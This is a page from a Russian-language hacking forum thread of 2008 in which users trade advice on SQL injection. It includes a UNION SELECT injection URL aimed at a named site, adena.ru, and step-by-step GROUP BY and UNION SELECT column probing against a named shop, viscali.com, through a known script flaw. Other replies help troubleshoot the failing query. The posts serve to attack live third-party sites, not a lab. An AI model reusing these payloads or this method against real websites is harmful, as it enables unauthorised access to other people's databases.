HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 128 из 2438 « Первая < 2878118 124 125 126 127 128 129 130 131 132 1381782286281128 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1271  
Старый 20.03.2008, 16:08
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию
можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
 
Ответить с цитированием

  #1272  
Старый 20.03.2008, 17:23
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию
Цитата:
Сообщение от bag  
можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
Да. Вот ссылка для примера.
Код:
http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'%3CH1%3E%D0%92%D0%AB%D0%92%D0%9E%D0%94%D0%98%D0%9C%D0%AB%D0%99%20%D0%A2%D0%95%D0%9A%D0%A1%D0%A2%3C/H1%3E',22/*
 
Ответить с цитированием

  #1273  
Старый 20.03.2008, 17:52
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию
чет не то
 
Ответить с цитированием

  #1274  
Старый 20.03.2008, 17:58
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию
т.е. это прокатит если знаешь кол-во столбцев, а если нет...
 
Ответить с цитированием

  #1275  
Старый 20.03.2008, 18:19
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 bag
Сформулируй вопрос яснее.Если ты имеешь ввиду как узнать есть ли инъекция при отключенных ошибках сервера то нужно почитать статьи т.к способов очень много и сдесь их все не изложишь Например эту:
_http://forum.antichat.ru/threadnav43966-1-10.html
Ну а вооще какой вопрос -такой ответ Dima-k17 написал тебе именно то ,что ты спросил
 
Ответить с цитированием

  #1276  
Старый 20.03.2008, 18:27
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию
да я имею ввиду как узнать есть ли инъекция при отключенных ошибках сервера, статьи читал, я ищу более менее универсальный метод, вывод текста на страницу было бы самое то
 
Ответить с цитированием

  #1277  
Старый 20.03.2008, 18:46
_3lf
Новичок
Регистрация: 17.03.2008
Сообщений: 4
Провел на форуме:
106766

Репутация: 19
По умолчанию
Столкнулся с такой проблемкой, мб поможете... Начнем с начала
Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php
Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php
Начал подбирать кол-во полей:
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка
Исходя из этого сделал вывод что столбец у нас один.
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
Последний раз редактировалось _3lf; 20.03.2008 в 22:03..
 
Ответить с цитированием

  #1278  
Старый 20.03.2008, 21:23
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
колличество то может быть и верное, а вот запрос неверный
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1279  
Старый 20.03.2008, 22:06
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
очень возможно, что там подряд идет два запроса, отсюда , когда у тебя верен первый, второй возвращает ложь.
 
Ответить с цитированием

  #1280  
Старый 20.03.2008, 22:17
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию
Цитата:
Сообщение от _3lf  
Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/*
Выдает ошибку... Почему, ведь количество столбцов верное?
select 1 фозвращает число ОДИН, а не первый столбец
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием
Ответ
Страница 128 из 2438 « Первая < 2878118 124 125 126 127 128 129 130 131 132 1381782286281128 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ